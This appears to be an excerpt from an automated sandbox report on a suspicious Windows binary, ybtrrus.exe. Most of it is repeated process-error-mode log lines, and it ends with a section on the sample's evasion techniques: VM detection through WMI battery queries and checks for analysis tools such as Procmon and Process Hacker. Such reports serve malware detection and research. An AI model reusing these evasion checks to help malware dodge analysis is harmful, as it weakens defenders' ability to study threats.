Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Source: C:\iDQiPwFWUp\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery
Source: C:\pnVcakKiqh\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: PROCMON.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: ybtrrus.exe	Binary or memory string: JOEBOXSERVER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: AUTORUNSC.EXE
